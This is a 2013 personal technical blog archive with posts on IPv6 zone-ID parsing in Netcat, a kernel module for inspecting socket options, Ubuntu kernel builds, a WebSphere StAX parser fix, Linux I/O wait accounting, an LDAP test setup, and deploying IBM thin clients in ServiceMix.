Monday, December 30, 2013

How to correctly parse IPv6 addresses (in C and Java)

I recently started to do some bug fixing in GNU Netcat. One of the things I worked on was better support for IPv6. In principle, IPv6 support was added to GNU Netcat quite some time ago on the trunk (aka 0.8-cvs), but it turned out that it doesn't really work. After fixing two obvious bugs (c8c0234, 714dcc5), I stumbled over another interesting issue.

One experiment I wanted to do with Netcat was to connect to another host over IPv6 using a link-local address. With IPv6, a link-local address is assigned automatically to each interface that has a MAC address (i.e. all Ethernet interfaces, but not the loopback interface). The IPv6 address is derived from the MAC address and is unique (because MAC addresses are unique). E.g. an interface with the MAC address 08:00:27:84:0b:e2 would get the following IPv6 address: fe80::a00:27ff:fe84:be2.

The problem with link-local addresses is that because of the way they are defined, the routing code in the operating system has no clue which interface it has to use in order to send packets to such an address. Here is where zone IDs come into play. The zone ID (also called scope ID) is a new feature in IPv6 that has no equivalent in IPv4. Basically, in the case considered here, it identifies the interface through which packets have to be sent (but the concept is more general).

Together with the concept of zone ID, the IPv6 specification also introduced a distinct notation to represent an address with an associated zone ID:


In the case considered here, the zone ID is simply the interface name (at least, that is how it works on Linux and Mac OS X). E.g. assuming that the remote host with MAC address 08:00:27:84:0b:e2 is attached to the same network as the eth0 interface on the local host, the complete address including the zone ID would be:


This address can indeed be used with programs such as SSH to connect to the remote host. Unfortunately that didn't work with GNU Netcat:

$ netcat -6 fe80::a00:27ff:fe84:be2%eth0 22
Error: Couldn't resolve host "fe80::a00:27ff:fe84:be2%eth0"

That raises the question how to correctly parse host parameters (passed on the command line or read from a configuration file) such that IPv6 addresses with zone IDs are recognized. It turns out that Netcat was using the following strategy:

  1. Attempt to use inet_pton to parse the host parameter as an IPv4 or IPv6 address.
  2. If the host parameter is neither parsable as an IPv4 address nor an IPv6 address, assume that it is a host name and use gethostbyname to look up the corresponding address.

The problem with that strategy is that although inet_pton and gethostbyname both support IPv6 addresses, they don't understand zone IDs. That is to be expected because both functions produce an in6_addr structure, but the zone ID is part of the corresponding socket address structure sockaddr_in6.

To fully support IPv6, several enhancements have been introduced in the Unix socket APIs. In our context the getaddrinfo function is the most relevant one. It is able to parse IP addresses and to translate host names, but in contrast to inet_pton and gethostbyname it produces sockaddr_in6 (or sockaddr_in) structures and fully supports zone IDs.

As a conclusion, to write C code that supports all types of IP address including IPv6 addresses with zone IDs, use the following approach:

  1. Don't use inet_pton and gethostbyname; always use getaddrinfo.
  2. Don't assume that the information to connect to a remote host can be stored separately as a host address (in_addr or in6_addr) and a port number: that is only true for IPv4, but not for IPv6. Instead you should always use a socket address so that the zone ID can be stored as well. Obviously there are use cases where the host address and port number need to be processed at different places in the code (consider e.g. a port scanner that takes a host address/name and a port range). In those cases, you can still use getaddrinfo, but with a NULL value for the service argument. You then have to store the partially filled socket address and complete the port number later.

Unfortunately, fixing existing code to respect those guidelines may require some extensive changes.

Interestingly, things are much easier and much more natural in Java. In fact, Java considers that the zone ID is part of the host address (an Inet6Address instance in this case) so that the socket address (InetSocketAddress) simply comprises a host address and port number, exactly as in IPv4. This means that any code that uses the standard InetAddress.getByName method to parse an IP address will automatically support IPv6 addresses with zone IDs. Note that this is true even for code not specifically written with IPv6 support in mind (and even for code written before the introduction of IPv6 support in Java 1.4), unless of course the code casts the returned InetAddress to an Inet4Address or is not prepared to encounter a : in the host address, e.g. because it uses it as a separator between the host address and the port number.

Thursday, December 19, 2013

Inspecting socket options on Linux

The other day the question came up whether on Linux it is possible to determine the socket options for a TCP socket created by some running process. The lsof command actually has an option for that (-T f), but it is not supported on Linux. The reason is that socket options are not exposed via the /proc filesystem. This means that the only way to do this is using strace, ltrace or similar tools. This is problematic because they require some special setup and/or produce large amounts of data that one needs to analyze in order to get the desired information. Moreover, since they trace the invocation of the setsockopt syscall, they have to be used at socket creation time and are useless if one needs to determine the options set on an already created socket.

In some cases, it is possible to determine the setting for particular socket options indirectly. E.g. the netstat -to command allows to determine if SO_KEEPALIVE is enabled on the socket for an established TCP connection: the -o option displays the currently active timer for each socket, and for established TCP connections with SO_KEEPALIVE set, this will be the keepalive timer. Obviously this is not a general solution since it only works for a small subset of all socket options.

To solve that issue, my original plan was to patch the Linux kernel to add the necessary information to the relevant files in /proc/net (tcp, tcp6, udp, udp6, etc.). However, it turned out that this is not a trivial change (such as adding a format specifier and argument to a printf call):

  • The files in /proc/net are not meant to be human readable; they define an interface between the kernel and user space tools. This means that before adding information about socket options, one first has to carefully define the format in which this information is presented.
  • The code that formats the entries in the various files in /proc/net is scattered over multiple files and partially duplicated (see e.g. tcp4_seq_show in net/ipv4/tcp_ipv4.c and tcp6_seq_show in net/ipv6/tcp_ipv6.c, as well as the functions called by these two functions).

That's why I finally settled on another idea, namely to write a kernel module that adds new files with the desired information to /proc/net. These files would be human readable (with a format similar to the output of the netstat command), so that one has more flexibility with respect to the presentation of the information in these files.

Fortunately the TCP/IP stack in Linux exports just enough of the relevant functions to enable reusing part of the code that generates the /proc/net/tcp and /proc/net/tcp6 files, making it fairly easy to implement such a kernel module. The source code for the module is available as a project on Github called knetstat. After building and loading the knetstat module, two new files appear in /proc/net:

$ cat /proc/net/tcpstat
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Options
tcp        0      0*               LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0*               LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0    *               LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0         ESTABLISHED SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp        0      0          ESTABLISHED SO_REUSEADDR=0,SO_KEEPALIVE=1
tcp        0      0       ESTABLISHED SO_REUSEADDR=1,SO_KEEPALIVE=1
tcp        0      0       ESTABLISHED SO_REUSEADDR=1,SO_KEEPALIVE=1
$ cat /proc/net/tcp6stat
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Options
tcp6       0      0 ::1:6010                :::*                    LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp6       0      0 ::1:6011                :::*                    LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0
tcp6       0      0 :::22                   :::*                    LISTEN      SO_REUSEADDR=1,SO_KEEPALIVE=0

As implied by the name of the module, the format is indeed similar to the output of netstat, except of course for the last column with the socket options:

$ netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0*               LISTEN     
tcp        0      0*               LISTEN     
tcp        0      0    *               LISTEN     
tcp        0      0         ESTABLISHED
tcp        0      0          ESTABLISHED
tcp        0      0       ESTABLISHED
tcp        0      0       ESTABLISHED
tcp6       0      0 ::1:6010                :::*                    LISTEN     
tcp6       0      0 ::1:6011                :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     

Note that at the time of writing, knetstat only supports a small set of socket options and lacks support for socket types other than TCP. Check the file for the current list of supported features.

Building and installing a vanilla Linux kernel on Ubuntu

This post describes a simple procedure to build and install a new Linux kernel on Ubuntu using the official source code from the kernel developers' Git repository. The aim is to produce a kernel that can be used as a drop-in replacement of the kernels shipped by Ubuntu and that neatly fits into the distribution. The procedure was tested with Linux 3.12 on Ubuntu 13.10.

  1. Ensure that you have enough free disk space. Building the kernel using the present procedure may require up to 13 GB (!) of storage.

  2. Install the necessary build tools:

    sudo apt-get install kernel-package git
  3. Download the kernel sources:

    git clone git://
  4. Check out the tag or branch for the kernel version you want to build. For example:

    cd linux
    git checkout v3.12
  5. Copy the configuration of the Ubuntu kernel. For the currently running kernel, use the following command:

    cp /boot/config-$(uname -r) .config
  6. Initialize new configuration options to their default values (See here for an explanation):

    yes "" | make oldconfig
  7. Use make-kpkg to compile the kernel and create Debian packages. You may want to use --append-to-version to add something to the version number, e.g. if you intend to apply patches to the kernel:

    fakeroot make-kpkg --initrd --append-to-version=-patched kernel-image kernel-headers
  8. Go back to the parent directory and install the generated packages using dpkg -i. This should take care of creating the initial ramdisk and configuring the boot loader. You can now reboot your system to load the new kernel.

Monday, December 9, 2013

Broken by design: WebSphere's default StAX implementation (part 2)

A few weeks ago I posted an article describing a vulnerability in WebSphere's default StAX implementation (XLXP 2). In the meantime, IBM has acknowledged that the problem I described indeed causes a security issue and they have produced a fix (see APAR PM99450). That fix introduces a new system property called described as follows:

The value of the property is a non-negative integer which determines the minimum number of bytes (as a percentage) that will be loaded into each buffer. The percentage is calculated with the following formula: 1/2n.

When the system property is not set its default value is 3. Setting the property to a lower value than the default can improve memory usage but may also reduce throughput.

In the last sentence IBM makes an interesting statement that raises some questions. Why would a change enabling the parser to read data into an already reserved and partially filled buffer potentially cause a reduction in throughput? To answer that question, one has to understand how IBM actually implemented that feature. Fortunately this doesn't require access to the source code. It is enough to carefully examine the visible behavior of the parser, namely by feeding it with an InputStream that returns data in small chunks and determining the correlation between read operations on that InputStream and events produced by the parser.

This reveals that the parser now uses the following algorithm: if after a first read operation the fill level determined by the new system property is not reached, a second read request will be issued immediately and this is repeated until the required fill level has been reached. The implication of this is that may need to read much more data than what is necessary to produce the next event. Stated differently, a call to may block even if enough data is available in the input stream.

As a matter of fact, this may have an impact on performance. Consider e.g. the processing of a SOAP message. With a well designed StAX implementation, the SOAP stack will be able to start processing the SOAP header before the SOAP body has been received completely. That is because a StAX implementation is expected to return an event as soon as enough data is available from the underlying input stream. E.g. if the next event is START_ELEMENT then a call to should return as soon as the start tag for that element has been read from the stream. With the change introduced by PM99450, that assumption is no longer true for XLXP 2.

Monday, November 18, 2013

The precise meaning of I/O wait time in Linux

Some time ago I had a discussion with some systems guys about the exact meaning of the I/O wait time which is displayed by top as a percentage of total CPU time. Their answer was that it is the time spent by the CPU(s) while waiting for outstanding I/O operations to complete. Indeed, the man page for the top command defines this as the "time waiting for I/O completion".

However, this definition is obviously not correct (or at least not complete), because a CPU never spends clock cycles waiting for an I/O operation to complete. Instead, if a task running on a given CPU blocks on a synchronous I/O operation, the kernel will suspend that task and allow other tasks to be scheduled on that CPU.

So what is the exact definition then? There is an interesting Server Fault question that discussed this. Somebody came up with the following definition that describes I/O wait time as a sub-category of idle time:

iowait is time that the processor/processors are waiting (i.e. is in an idle state and does nothing), during which there in fact was outstanding disk I/O requests.

That makes perfect sense for uniprocessor systems, but there is still a problem with that definition when applied to multiprocessor systems. In fact, "idle" is a state of a CPU, while "waiting for I/O completion" is a state of a task. However, as pointed out earlier, a task waiting for outstanding I/O operations is not running on any CPU. So how can the I/O wait time be accounted for on a per-CPU basis?

For example, let's assume that on an otherwise idle system with 4 CPUs, a single, completely I/O bound task is running. Will the overall I/O wait time be 100% or 25%? I.e. will the I/O wait time be 100% on a single CPU (and 0% on the others), or on all 4 CPUs? This can be easily checked by doing a simple experiment. One can simulate an I/O bound process using the following command, which will simply read data from the hard disk as fast as it can:

dd if=/dev/sda of=/dev/null bs=1MB

Note that you need to execute this as root and if necessary change the input file to the appropriate block device for your hard disk.

Looking at the CPU stats in top (press 1 to get per-CPU statistics), you will see something like this:

%Cpu0  :  3,1 us, 10,7 sy,  0,0 ni,  3,5 id, 82,4 wa,  0,0 hi,  0,3 si,  0,0 st
%Cpu1  :  3,6 us,  2,0 sy,  0,0 ni, 90,7 id,  3,3 wa,  0,0 hi,  0,3 si,  0,0 st
%Cpu2  :  1,0 us,  0,3 sy,  0,0 ni, 96,3 id,  2,3 wa,  0,0 hi,  0,0 si,  0,0 st
%Cpu3  :  3,0 us,  0,3 sy,  0,0 ni, 96,3 id,  0,3 wa,  0,0 hi,  0,0 si,  0,0 st

This clearly indicates that a single I/O bound task only increases the I/O wait time on a single CPU. Note that you may see that occasionally the task "switches" from one CPU to another. That is because the Linux kernel tries to schedule a task on the CPU it ran last (in order to improve CPU cache hit rates). The taskset command can be used to "pin" a process to a given CPU so that the experiment becomes more reproducible (Note that the first command line argument is not the CPU number, but a mask):

taskset 1 dd if=/dev/sda of=/dev/null bs=1MB

Another interesting experiment is to run a CPU bound task at the same time on the same CPU:

taskset 1 sh -c "while true; do true; done"

The I/O wait time now drops to 0 on that CPU (and also remains 0 on the other CPUs), while user and system time account for 100% CPU usage:

%Cpu0  : 80,3 us, 15,5 sy,  0,0 ni,  0,0 id,  0,0 wa,  0,0 hi,  4,3 si,  0,0 st
%Cpu1  :  4,7 us,  3,4 sy,  0,0 ni, 91,3 id,  0,0 wa,  0,0 hi,  0,7 si,  0,0 st
%Cpu2  :  2,3 us,  0,3 sy,  0,0 ni, 97,3 id,  0,0 wa,  0,0 hi,  0,0 si,  0,0 st
%Cpu3  :  2,7 us,  4,3 sy,  0,0 ni, 93,0 id,  0,0 wa,  0,0 hi,  0,0 si,  0,0 st

That is expected because I/O wait time is a sub-category of idle time, and the CPU to which we pinned both tasks is never idle.

These findings allow us to deduce the exact definition of I/O wait time:

For a given CPU, the I/O wait time is the time during which that CPU was idle (i.e. didn't execute any tasks) and there was at least one outstanding disk I/O operation requested by a task scheduled on that CPU (at the time it generated that I/O request).

Note that the nuance is not innocent and has practical consequences. For example, on a system with many CPUs, even if there is a problem with I/O performance, the observed overall I/O wait time may still be small if the problem only affects a single task. It also means that while it is generally correct to say that faster CPUs tend to increase I/O wait time (simply because a faster CPU tends to be idle more often), that statement is no longer true if one replaces "faster" by "more".

Saturday, November 16, 2013

WebSphere & ApacheDS quick setup guide

This article explains how to quickly configure WebSphere with Apache Directory Server (ApacheDS) for LDAP authentication. We will use the ApacheDS server that comes packaged with Apache Directory Studio. This has the advantage that we only need a single tool to set up the LDAP server and to populate the directory. Obviously the setup described here is not meant for production uses; the goal is to rapidly create a working LDAP configuration for testing purposes. It is assumed that the reader is familiar with configuring security (and in particular standalone LDAP registries) in WebSphere. No prior experience with ApacheDS is required.

Start by setting up the LDAP server:

  1. Download, install and start Apache Directory Studio. The present article is based on version 2.0.0-M8, but the procedure should be similar for other versions.

  2. Using the "Servers" view, create a new ApacheDS server. There is no need to change the configuration; the default settings are appropriate for a test server. After the server has been created, start it:

  3. Create a connection to the server. To do this, right click on the server and choose "Create a Connection". The new connection should then appear in the "Connections" view. Double click on the connection to open it. You should see the following entries in the "LDAP Browser" view: dc=example,dc=com, ou=config, ou=schema and ou=system.

  4. Create two entries with RDN ou=users and ou=groups under dc=example,dc=com, both with object class organizationalUnit.

  5. For each test user, create an entry with object class inetOrgPerson under ou=users. For the RDN, use uid=<username>. Then fill in the cn and sn attributes (cn is the common name which should be the given name plus surname; sn is the surname alone). Also add a userPassword attribute.

  6. Under ou=groups, create as many groups as needed. There should be at least one group that will be mapped to the administrator role in WebSphere. For the object class, one can use either groupOfNames or groupOfUniqueNames. They are more or less the same, but the former is easier to set up, because Directory Studio will allow you to select members by browsing the directory. For the RDN, use cn=<groupname>. When using groupOfNames, Directory Studio will automatically open a dialog to select the first member of the group. Additional members can be defined by adding more values to the member attribute.

  7. Also define a uid=admin user that will be used as the primary administrative user in the WebSphere configuration. Since this is not a person, but a technical account, you can use the object classes account and simpleSecurityObject to create this user. Note that the uid=admin user doesn't need to be a member of any group.

The resulting LDAP tree should look as follows:

You can now configure the standalone LDAP registry in WebSphere. The settings are as follows:

  • Primary administrative user name: admin
  • Type of LDAP server: Custom
  • Host/port: localhost:10389 (if you kept the default configuration for ApacheDS, and the server is running on the same host)
  • Base distinguished name: dc=example,dc=com

You also need to specify the following properties in the advanced LDAP user registry settings:

  • User filter: (&(uid=%v)(|(objectclass=inetOrgPerson)(objectclass=account)))
  • Group filter: (&(cn=%v)(|(objectclass=groupOfNames)(objectclass=groupOfUniqueNames)))
  • User ID map: *:uid
  • Group ID map: *:cn
  • Group member ID map: groupOfNames:member;groupOfUniqueNames:uniqueMember

Monday, November 11, 2013

Deploying the WebSphere EJB thin client in ServiceMix

In a previous post I explained how to install the SIB thin client into ServiceMix and use it in a Camel route. In that post I used the JmsFactoryFactory API to create the JMS connection factory and the Queue object. However, it should also be possible to configure them in WebSphere and look them up using JNDI. Performing that JNDI lookup requires two additional libraries:

  • The EJB thin client:
  • The IBM ORB (Object Request Broker):

Both JARs can be found in the runtimes directory in the WebSphere installation. The latter is required only on non-IBM JREs. In the following I will make the assumption that ServiceMix is running on an Oracle JRE and that we need both JARs.

In a Java SE environment it is relatively straightforward to create a Camel configuration that uses the EJB thin client to look up the necessary JMS resources from WebSphere. Here is a sample configuration that is basically equivalent to the one used in the earlier post:

<beans xmlns=""

      <camel:from uri="file://test"/>
      <camel:to uri="sib:queue:jms/testQ"/>
  <bean id="sib" class="org.apache.camel.component.jms.JmsComponent">
    <property name="connectionFactory">
      <jee:jndi-lookup resource-ref="false" jndi-name="jms/testQCF" environment-ref="env"
                       lookup-on-startup="false" expected-type="javax.jms.QueueConnectionFactory"/>
    <property name="destinationResolver">
      <bean class="">
        <property name="jndiEnvironment" ref="env"/>
  <util:properties id="env">
    <prop key="java.naming.factory.initial"></prop>
    <prop key="java.naming.provider.url">corbaloc:iiop:isis:2809</prop>

The only requirements are:

  • The three JARs (the SIB thin client, the EJB thin client and the ORB) must be in the classpath.
  • A queue (jms/testQ) and a connection factory (jms/testQCF) must be configured in WebSphere. The provider endpoints must be set manually in the connection factory configuration. If you are using an existing connection factory, remember that specifying the provider endpoints is not required for applications running on WebSphere. Therefore it is possible (and even likely) that they are not set.
  • The provider URL must point to the BOOTSTRAP_ADDRESS of the application server. If the JNDI resources are configured on a WebSphere cluster, use a corbaloc URL with multiple IIOP endpoints.

The challenge is now to make that configuration work on ServiceMix. We will make the following assumptions:

  • The ServiceMix version is 4.5.3.
  • We will use the libraries from WAS
  • The SIB thin client has already been deployed on ServiceMix using the instructions in my earlier post.

The remaining task is then to deploy the EJB thin client and the ORB. The EJB thin client is actually already packaged as an OSGi bundle, while the ORB is packaged as a fragment that plugs into the EJB thin client. Therefore it should be enough to install these two artifacts into ServiceMix. However, it turns out that this is not as simple as one would expect.

Problem 1: Missing required bundle org.eclipse.osgi

The first problem that appears is that after installing the EJB thin client and the ORB, an attempt to start the EJB thin client bundle results in the following error:

org.osgi.framework.BundleException: Unresolved constraint in bundle [182]: Unable to resolve 182.0: missing requirement [182.0] module; (bundle-symbolic-name=org.eclipse.osgi)

Inspection of the manifests of these two artifacts indeed shows that they have the following directive:

Require-Bundle: org.eclipse.osgi

Obviously, IBM packaged these artifacts for the Equinox platform (which is also used by WebSphere itself). Because ServiceMix runs on Apache Felix, the bundle org.eclipse.osgi doesn't exist. Since the EJB thin client bundle has an activator, it is likely that the purpose of this directive is simply to satisfy the dependency on the org.osgi.framework package.

One possible solution for this problem would be to modify the manifests and replace the Require-Bundle directive by an equivalent Import-Package directive. However, there is another solution that doesn't require modifying the IBM artifacts. The idea is to create a "compatibility" bundle with the following manifest (and without any other content):

Manifest-Version: 1.0
Bundle-ManifestVersion: 2
Bundle-Name: Equinox compatibility bundle
Bundle-SymbolicName: org.eclipse.osgi
Bundle-Version: 0.0.0
Import-Package: org.osgi.framework
Export-Package: org.osgi.framework

The Export-Package directive makes the org.osgi.framework package available to the EJB thin client bundle. Since the compatibility bundle also imports that package, it will effectively be wired to the bundle that actually contains these classes (which must exist in any OSGi runtime because the org.osgi.framework package is part of the core OSGi API).

Problem 2: Constraint violation related to javax.transaction.xa

After installing the compatibility org.eclipse.osgi bundle, the EJB thin client bundle still fails to start. The error message is now:

org.osgi.framework.BundleException: Uses constraint violation. Unable to resolve module [182.0] because it exports package 'javax.transaction.xa' and is also exposed to it from module org.apache.aries.transaction.manager [58.0] via the following dependency chain: [182.0]
    import: (package=javax.jms)
    export: package=javax.jms; uses:=javax.transaction.xa
  org.apache.geronimo.specs.geronimo-jms_1.1_spec [48.0]
    import: (package=javax.transaction.xa)
    export: package=javax.transaction.xa
  org.apache.aries.transaction.manager [58.0]

Let's first decode what this actually means. The thin client bundle exports the javax.transaction.xa package, but it doesn't import it. That implies that it can't be wired to the javax.transaction.xa package exported by the Aries transaction manager bundle. At the same time the thin client imports the javax.jms package. The OSGi runtime choses to wire that import to the Geronimo JMS API bundle. The javax.jms package contains classes that refer to classes in the javax.transaction.xa package as part of their public API (see e.g. XASession). That is expressed by the uses constraint (and a corresponding Import-Package directive) declared by the Geronimo bundle. However, the OSGi runtime cannot wire that import back to the thin client because this would cause a circular dependency; it has to wire it to the Aries bundle. That however would cause an issue because the thin client bundle now "sees" classes in the javax.transaction.xa package loaded from two different bundles (itself and the Aries bundle). Therefore the OSGi runtime refuses to resolve the thin client bundle.

That sounds like a tricky problem, but the solution is astonishingly simple: just remove the Geronimo JMS bundle!

osgi:uninstall geronimo-jms_1.1_spec

After that you should restart ServiceMix so that it can properly rewire all bundles.

To see why this works, let's first note that in ServiceMix, the javax.transaction.xa package is configured for boot delegation (see the org.osgi.framework.bootdelegation property in etc/ That means that classes in that package will always be loaded from the boot class loader, i.e. from the JRE. That in turn means that the issue detected by the OSGi runtime will actually never occur: no matter how imports and exports for javax.transaction.xa are formally wired together, it's always the classes from the JRE that will be loaded anyway. The uses:=javax.transaction.xa declaration in the Geronimo bundle is therefore effectively irrelevant and could be ignored.

Now recall that we made the assumption that the SIB thin client bundle is already installed. That bundle exports javax.jms as well, but since it also imports that package, this export will not be used as long as the Geronimo JMS bundle is installed. Let's have a closer look at the imports and exports of that bundle:

karaf@root> osgi:headers

IBM SIB JMS Thin Client (181)
Manifest-Version = 1.0
Specification-Title = sibc.client.thin.bundle
Eclipse-LazyStart = true
Specification-Version = 8.5.0
Specification-Vendor = IBM Corp.
Ant-Version = Apache Ant 1.8.2
Copyright = Licensed Materials - Property of IBM  5724-J08, 5724-I63, 5724-H88, 5724-H89, 5655-N02, 5733-W70  Copyright IBM Corp. 2007, 2009 All Rights Reserved.  US Government Users Restricted Rights - Use, duplication or disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
Implementation-Version = WAS855.IM [gm1319.01]
Implementation-Vendor = IBM Corp.
Implementation-Title = sibc.client.thin.bundle
Created-By = pxi3260sr10-20111208_01 (SR10) (IBM Corporation)

Bundle-Vendor = IBM Corp.
Bundle-Localization = plugin
Bundle-RequiredExecutionEnvironment = J2SE-1.5
Bundle-Name = IBM SIB JMS Thin Client
Bundle-SymbolicName =; singleton:=true
Bundle-Classpath = .
Bundle-Version = 8.5.0
Bundle-ManifestVersion = 2

Import-Package = 
Export-Package =,,,
Require-Bundle = 

Interestingly, javax.transaction.xa isn't mentioned at all. Looking at the content of that bundle, one can also see that it neither contains that package. This means that the SIB thin client was packaged with the assumption that javax.transaction.xa is configured for boot delegation (while the Geronimo JMS API bundle doesn't rely on that assumption). This is exactly what we need in our case. By removing the Geronimo bundle, we force the OSGi runtime to use the javax.jms package exported by the SIB thin client, and that solves the issue.

The EJB thin client indeed starts properly after doing that:

[ 181] [Active     ] [            ] [       ] [   80] IBM SIB JMS Thin Client (8.5.0)
[ 182] [Active     ] [            ] [       ] [   80] WebSphere EJB Thin Client Runtime (8.0.0)
                                       Fragments: 183
[ 183] [Resolved   ] [            ] [       ] [   80] WebSphere ORB Fragment (8.0.0)
                                       Hosts: 182
[ 185] [Active     ] [            ] [       ] [   80] Equinox compatibility bundle (0.0.0)

Problem 3: Inconsistent javax.resource.spi packages

We can now deploy the Spring configuration shown earlier. It deploys and starts successfully, but when trying to use it (by dropping a file into the test directory), an error occurs. The relevant part of the stack trace is as follows: Exception occurred while the JNDI NamingManager was processing a javax.naming.Reference object. [Root exception is java.lang.NoClassDefFoundError: Ljavax/resource/spi/TransactionSupport$TransactionSupportLevel;]
  at javax.naming.InitialContext.lookup
  at org.springframework.jndi.JndiTemplate$1.doInContext
  at org.springframework.jndi.JndiTemplate.execute
  at org.springframework.jndi.JndiTemplate.lookup
  at org.springframework.jndi.JndiTemplate.lookup
  at org.springframework.jndi.JndiLocatorSupport.lookup
  at org.springframework.jndi.JndiObjectLocator.lookup
  at org.springframework.jndi.JndiObjectTargetSource.getTarget
  ... 50 more
Caused by: java.lang.NoClassDefFoundError: Ljavax/resource/spi/TransactionSupport$TransactionSupportLevel;
  at java.lang.Class.getDeclaredFields0
  at java.lang.Class.privateGetDeclaredFields
  at java.lang.Class.getDeclaredField
  at javax.naming.spi.NamingManager.getObjectInstance
  ... 67 more

The error occurs when Spring attempts to look up the JMS connection factory from JNDI. It is actually caused by an issue in the packaging of the IBM artifacts. The SIB and EJB thin clients both have javax.resource.spi in their Import-Package and Export-Package directives. Since that package is not exported by any other bundle deployed on ServiceMix, the OSGi runtime has two possibilities to resolve this situation: either it wires the javax.resource.spi import from the EJB thin client to the SIB thin client bundle or vice versa. The problem is that the javax.resource.spi package in the SIB thin client is incomplete: it contains fewer classes than the same package in the EJB thin client. If the OSGi runtime selects the package from the SIB thin client bundle, then this leads to the NoClassDefFoundError shown above.

One solution would be to change the order of installation of the two bundles in order to convince the OSGi runtime to select the javax.resource.spi exported by the EJB thin client. However, this would be a very fragile solution. A better solution is to add another bundle that exports the full javax.resource.spi package (without importing it). In that case, the OSGi runtime only has a single possibility to wire the imports/exports for that package, namely to use the version exported by the third bundle. Such a bundle actually exists in the WebSphere runtime and adding it to ServiceMix indeed solves the problem:

osgi:install file:///opt/IBM/WebSphere/AppServer/plugins/javax.j2ee.connector.jar

Problem 4: Class loading issues related to the IBM ORB

After installing that bundle, you should restart ServiceMix to allow it to rewire the bundles properly. The JNDI lookup of the connection factory now succeeds, but another failure occurs when Spring tries to create a connection:

java.lang.NoClassDefFoundError: com/ibm/CORBA/iiop/ORB
  at java.lang.Class.forName0
  at java.lang.Class.forName
  at java.lang.Class.forName0
  at java.lang.Class.forName
  at sun.reflect.NativeMethodAccessorImpl.invoke0
  at sun.reflect.NativeMethodAccessorImpl.invoke
  at sun.reflect.DelegatingMethodAccessorImpl.invoke
  at java.lang.reflect.Method.invoke
  at org.springframework.aop.framework.JdkDynamicAopProxy.invoke
  at com.sun.proxy.$Proxy52.createConnection
  at org.springframework.jms.core.JmsTemplate.execute
  at org.apache.camel.component.jms.JmsConfiguration$CamelJmsTemplate.send
  at org.apache.camel.component.jms.JmsProducer.doSend
  at org.apache.camel.component.jms.JmsProducer.processInOnly
  at org.apache.camel.component.jms.JmsProducer.process
  ... 42 more
Caused by: java.lang.ClassNotFoundException: not found by
  at org.apache.felix.framework.ModuleImpl.findClassOrResourceByDelegation
  at org.apache.felix.framework.ModuleImpl.access$400
  at org.apache.felix.framework.ModuleImpl$ModuleClassLoader.loadClass
  at java.lang.ClassLoader.loadClass
  ... 70 more

Interestingly, if one installs the ORB fragment before the EJB thin client, then the Camel route fails much earlier (during the creation of the InitialContext) with an error that is different, but related to the same class:

org.omg.CORBA.INITIALIZE: can't instantiate default ORB implementation  vmcid: 0x0  minor code: 0  completed: No
  at org.omg.CORBA.ORB.create_impl
  at org.omg.CORBA.ORB.init
  ... 68 more
Caused by: java.lang.ClassCastException: cannot be cast to org.omg.CORBA.ORB
  at org.omg.CORBA.ORB.create_impl
  ... 74 more

It is not clear whether this is a packaging issue in the IBM artifacts or a bug in Karaf/Felix. A solution is to add the ORB to the endorsed libraries instead of installing it as an OSGi fragment. At first this might seem to be an ugly workaround, but it actually makes sense. In the IBM JRE, these classes are part of the runtime libraries. By adding them to the endorsed libraries one basically makes the Oracle JRE look a bit more like an IBM JRE.

Note that if we endorse the IBM ORB, then it is actually more naturally to use the JARs shipped with the IBM JRE instead of the ORB bundle. These JARs can be found in the java/jre/lib directory in the WebSphere installation. We need the following JARs from that directory: ibmcfw.jar, ibmorb.jar and ibmorbapi.jar. After copying these files to the lib/endorsed directory in the ServiceMix installation, remove the ORB fragment:


To make the ORB classes visible to the EJB thin client it is necessary to add org.omg.* and* to the org.osgi.framework.bootdelegation property in etc/ Note that this would also be necessary on an IBM JRE. It means that the EJB thin client assumes that boot delegation is enabled for these packages.

Problem 5: Missing classes from

After restarting ServiceMix, one now gets the following error:

java.lang.NoClassDefFoundError: Could not initialize class

If one looks at the first occurrence of the error, one can see that the failure to initialize the CredentialType class is caused by the following exception:

java.lang.ClassNotFoundException: not found by

Inspection of the content of the JMS thin client bundle shows that it contains the package, but is missing the BootHandlerException class. That class is actually part of lib/bootstrap.jar in the WebSphere runtime. We could add that JAR to the endorsed libraries, but in contrast to the ORB classes, this is not a natural solution. It is actually enough to add it to the main class loader used to load Karaf. This can be done by copying the JAR to the lib directory in the ServiceMix installation. Note that the classes will be visible to the SIB thin client because we already added* to the boot delegation list before.

After adding bootstrap.jar and restarting ServiceMix, the sample route now executes successfully! Interestingly bootstrap.jar is not required when executing the sample in a Java SE environment. This means that the issue occurs on a code path that is only executed in an OSGi environment.

Summary and conclusion

To summarize, the following steps are necessary to deploy the SIB and EJB thin clients as OSGi bundles in ServiceMix:

  1. Copy the following files from the WebSphere installation to the lib/endorsed directory:

    • java/jre/lib/ibmcfw.jar
    • java/jre/lib/ibmorb.jar
    • java/jre/lib/ibmorbapi.jar

    On an IBM JRE, this step would be skipped.

  2. Copy lib/bootstrap.jar from the WebSphere installation to the lib directory.

  3. Add org.omg.* and* to the org.osgi.framework.bootdelegation property in etc/

  4. Create and install the Equinox compatibility bundle as described above.

  5. Install the following bundles from the WebSphere runtime:

    • plugins/javax.j2ee.connector.jar
    • runtimes/
    • runtimes/
  6. Uninstall the geronimo-jms_1.1_spec bundle.

We have also seen that the SIB and EJB thin client bundles have several packaging issues. In particular they appear to have been bundled under the assumption that a certain number of packages are configured for boot delegation. As already argued in relation to the dependency on the org.eclipse.osgi bundle, the reason is probably that they were created for Equinox as a target OSGi runtime. In fact, the assumptions made about boot delegation are compatible with the default configuration in Equinox. What is more interesting is the fact that these packages also include That package is visible through boot delegation only in WebSphere, but the thin clients are obviously not supposed to be deployed as OSGi bundles in WebSphere...

It should also be noted that the solution was only tested with a very simple scenario. It is possible that in more complex scenarios, additional issues arise.

Finally, given the difficulties to install the thin clients as OSGi artifacts, one may reasonably argue that it might actually be simpler to just repackage them...

